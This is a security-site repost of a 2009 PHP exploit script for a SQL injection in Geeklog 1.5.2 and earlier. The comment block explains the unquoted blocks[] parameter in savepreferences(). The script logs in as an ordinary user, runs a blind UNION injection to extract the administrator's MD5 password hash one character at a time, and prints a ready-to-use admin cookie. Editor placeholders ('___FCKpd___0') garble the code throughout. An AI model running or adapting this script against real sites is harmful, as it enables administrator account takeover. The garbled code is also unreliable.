首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
来源:http://retrogod.altervista.org/ 作者:bookoo 发布时间:2009-04-17  
<?php
    /*
    Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
    by Nine:Situations:Group::bookoo
     
    our site: http://retrogod.altervista.org/
    software site: http://www.geeklog.net/
     
    PHP and MySQL version independent
     
    vulnerability, see usersettings.php near lines 1467 - 1480:
     
    ...
    if (isset (
___FCKpd___0
USER['uid']) && (
___FCKpd___0
USER['uid'] > 1)) { switch ($mode) { case 'saveuser': savepreferences (
___FCKpd___0
POST); $display .= saveuser(
___FCKpd___0
POST); PLG_profileExtrasSave (); break; case 'savepreferences': savepreferences (
___FCKpd___0
POST); $display .= COM_refresh (
___FCKpd___0
CONF['site_url'] . '/usersettings.php?mode=preferences&amp;msg=6'); break; ... all the
___FCKpd___0
POST[] variables are passed to the savepreferences() function now look the function always in usersettings.php: ... function savepreferences($A) { global
___FCKpd___0
CONF,
___FCKpd___0
TABLES,
___FCKpd___0
USER; if (isset ($A['noicons']) && ($A['noicons'] == 'on')) { $A['noicons'] = 1; } else { $A['noicons'] = 0; } if (isset ($A['willing']) && ($A['willing'] == 'on')) { $A['willing'] = 1; } else { $A['willing'] = 0; } if (isset ($A['noboxes']) && ($A['noboxes'] == 'on')) { $A['noboxes'] = 1; } else { $A['noboxes'] = 0; } if (isset ($A['emailfromadmin']) && ($A['emailfromadmin'] == 'on')) { $A['emailfromadmin'] = 1; } else { $A['emailfromadmin'] = 0; } if (isset ($A['emailfromuser']) && ($A['emailfromuser'] == 'on')) { $A['emailfromuser'] = 1; } else { $A['emailfromuser'] = 0; } if (isset ($A['showonline']) && ($A['showonline'] == 'on')) { $A['showonline'] = 1; } else { $A['showonline'] = 0; } $A['maxstories'] = COM_applyFilter ($A['maxstories'], true); if (empty ($A['maxstories'])) { $A['maxstories'] = 0; } else if ($A['maxstories'] > 0) { if ($A['maxstories'] <
___FCKpd___0
CONF['minnews']) { $A['maxstories'] =
___FCKpd___0
CONF['minnews']; } } $TIDS = @array_values($A[
___FCKpd___0
TABLES['topics']]); $AIDS = @array_values($A['selauthors']); $BOXES = @array_values($A["{
___FCKpd___0
TABLES['blocks']}"]); //<--------- this is
___FCKpd___0
POST[(prefix)blocks] $ETIDS = @array_values($A['etids']); $tids = ''; if (sizeof ($TIDS) > 0) { $tids = addslashes (implode (' ', $TIDS)); } $aids = ''; if (sizeof ($AIDS) > 0) { $aids = addslashes (implode (' ', $AIDS)); } $selectedblocks = ''; if (count ($BOXES) > 0) { $boxes = addslashes (implode (',', $BOXES)); //<---------- this addslashes() is totally unuseful //**** SQL INJECTION HERE *** $boxes is not surrounded by quotes! $blockresult = DB_query("SELECT bid,name FROM {
___FCKpd___0
TABLES['blocks']} WHERE bid NOT IN ($boxes)"); $numRows = DB_numRows($blockresult); for ($x = 1; $x <= $numRows; $x++) { $row = DB_fetchArray ($blockresult); if ($row['name'] <> 'user_block' AND $row['name'] <> 'admin_block' AND $row['name'] <> 'section_block') { $selectedblocks .= $row['bid']; if ($x <> $numRows) { $selectedblocks .= ' '; } } } } ... read the lines commented! This tool extracts the admin hash from db by asking true/false questions to MySQL and interpreting some checkboxes in response, but requires a simple user account. vulnerability ii, information disclosure: now I see that table prefix is showed inside html because they used table names for the
___FCKpd___0
TABLES[] array */ $err[0] = "[!] This script is intended to be launched from the cli!"; $err[1] = "[!] You need the curl extesion loaded!"; if (php_sapi_name() <> "cli") { die($err[0]); } if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl("php_curl.dll") ? die($err[1]) : nil; } else { !dl("php_curl.so") ? die($err[1]) : nil; } } function syntax() { print ( "Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS] \n". "Options: \n". "--c:[uid:hash ] - use your user cookie, instead of uses/pwd pair \n". "--port:[port] - specify a port \n". " default->80 \n". "--uid:[n] - specify an uid other than default (2,usually admin)\n". "--proxy:[host:port] - use proxy \n". "--skiptest - skip preliminary tests \n". "--test - run only tests \n". "Examples: php ".$argv[0]." 192.168.0.1 /geeklog/ bookoo pass \n". " php ".$argv[0]." 192.168.0.1 / bookoo pass --proxy:1.1.1.1:8080\n". " php ".$argv[0]." 192.168.0.1 / bookoo pass --uid:3 \n". " php ".$argv[0]." 192.168.0.1 /geeklog/ * * -c:3:5f4dcc3b5aa765d61d8327deb882cf99"); die(); } error_reporting(E_ALL ^ E_NOTICE); $host = $argv[1]; $path = $argv[2];
___FCKpd___0
user = $argv[3];
___FCKpd___0
pwd = $argv[4]; //default $uid = "2"; $where = "uid=$uid"; //user id, usually admin, anonymous = 1 $argv[4] ? print("[*] Attacking...\n") : syntax();
___FCKpd___0
use_proxy = false; $port = 80;
___FCKpd___0
skiptest = false;
___FCKpd___0
test = false;
___FCKpd___0
use_ck = false; for ($i = 3; $i < $argc; $i++) { if (stristr($argv[$i], "--proxy:")) {
___FCKpd___0
use_proxy = true; $tmp = explode(":", $argv[$i]); $proxy_host = $tmp[1]; $proxy_port = (int)$tmp[2]; } if (stristr($argv[$i], "--port:")) { $tmp = explode(":", $argv[$i]); $port = (int)$tmp[1]; } if (stristr($argv[$i], "--uid")) { $tmp = explode(":", $argv[$i]); $uid = (int)$tmp[1]; $where = "uid=$uid"; } if (stristr($argv[$i], "--skiptest")) {
___FCKpd___0
skiptest = true; } if (stristr($argv[$i], "--test")) {
___FCKpd___0
test = true; } if (stristr($argv[$i], "--c")) {
___FCKpd___0
use_ck = true; $tmp = explode(":", $argv[$i]); $tmp[1] = (int)$tmp[1]; $cookies = "geeklog=".$tmp[1]."; password=".$tmp[2].";"; } } function _s($url, $ck, $is_post, $request) { global
___FCKpd___0
use_proxy, $proxy_host, $proxy_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($is_post) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n"); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"); curl_setopt($ch, CURLOPT_TIMEOUT, 0); curl_setopt($ch, CURLOPT_HEADER, 1); $cookies = array("Cookie: ".$ck); curl_setopt($ch, CURLOPT_HTTPHEADER, $cookies); if (
___FCKpd___0
use_proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port); }
___FCKpd___0
d = curl_exec($ch); if (curl_errno($ch)) { die("[!] ".curl_error($ch)."\n"); } else { curl_close($ch); } return
___FCKpd___0
d; } function chk_err($s) { if (stripos ($s, "\x41\x6e\x20\x53\x51\x4c\x20\x65\x72\x72\x6f\x72\x20\x68\x61\x73\x20\x6f\x63\x63\x75\x72\x72\x65\x64")) { return true; } else { return false; } } function run_test() { global $host, $port, $path, $cookies, $url, $prefix;
___FCKpd___0
sql = ")"; $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode(
___FCKpd___0
sql)."&"); if (chk_err($out)) { print("[*] Vulnerable!\n"); } else { die ("[!] Not vulnerable ..."); } } function login() { global $host, $port, $path,
___FCKpd___0
user,
___FCKpd___0
pwd; $url = "http://$host:$port".$path."users.php"; $out = _s($url, "", 1, "loginname=
___FCKpd___0
user&passwd=
___FCKpd___0
pwd&submit=Login"); $tmp = explode("\x0d\x0a\x0d\x0a", $out); $tmp = explode("\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20", $tmp[0]); $cookies = ""; for ($i = 1; $i < count($tmp); $i++) { $tmp_i = explode(";", $tmp[$i]); $cookies .= $tmp_i[0]."; "; } if (stripos ($cookies, "\x70\x61\x73\x73\x77\x6f\x72\x64")) { return $cookies; } else { die("[*] Unable to login!"); } } function xtrct_prefix() { global $host, $port, $path, $cookies, $url; $out = _s($url, $cookies, 0, ""); $tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out); if (count($tmp) < 2) { die("[!] Not logged in!"); } $tmp = explode("\x22", $tmp[0]); $prefix = $tmp[count($tmp)-1]; return $prefix; } function is_checked() { global $host, $port, $path, $cookies, $url; $out = _s($url, $cookies, 0, ""); $tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out); $tmp = explode("\x3e", $tmp[1]); $s = $tmp[0]; if (stripos ($s, "\x22\x63\x68\x65\x63\x6b\x65\x64\x22")) { return 1; } else { return 0; } } if (!
___FCKpd___0
use_ck) { $cookies = login(); } $url = "http://$host:$port".$path."usersettings.php"; $prefix = xtrct_prefix(); print "[*] prefix->'".$prefix."'\n"; if (!
___FCKpd___0
skiptest) { run_test(); } if (
___FCKpd___0
test) { die; } #uncheck all boxes $rst_sql = "0) AND 0 UNION SELECT 1,0x61646d696e5f626c6f636b FROM ".$prefix."users WHERE ".$where." LIMIT 1/*"; $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&"); #then start extraction $c = array(); $c = array_merge($c, range(0x30, 0x39)); $c = array_merge($c, range(0x61, 0x66)); $url = "http://$host:$port".$path;
___FCKpd___0
hash = ""; print ("[*] Initiating hash extraction ...\n"); for ($j = 1; $j < 0x21; $j++) { for ($i = 0; $i <= 0xff; $i++) { $f = false; if (in_array($i, $c)) { $sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR 1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*"; $url = "http://$host:$port".$path."usersettings.php"; $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&"); if (is_checked()) { $f = true;
___FCKpd___0
hash .= chr($i); print "[*] Md5 Hash: ".
___FCKpd___0
hash.str_repeat("?", 0x20-$j)."\n"; #if found , uncheck again $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&"); break; } } } if ($f == false) { die("\n[!] Unknown error ..."); } } print "[*] Done! Cookie: geeklog=$uid; password=".
___FCKpd___0
hash.";\n"; ?> original url: http://retrogod.altervista.org/9sg_geeklog_152_usersettings_sql.html

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apollo 37zz (M3u File) Local H
·Zervit Webserver 0.02 Remote B
·Elecard AVC HD Player .XPL Sta
·MS Windows Media Player (.mid
·webSPELL 4.2.0c Bypass BBCode
·Star Downloader Free <= 1.45
·Oracle APEX 3.2 Unprivileged D
·eLitius 1.0 (manage-admin.php)
·MagicISO CCD/Cue Local Heap Ov
·Apache Geronimo Application Se
·PowerCHM 5.7 (Long URL) Local
·The Miniweb webserver suffers
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved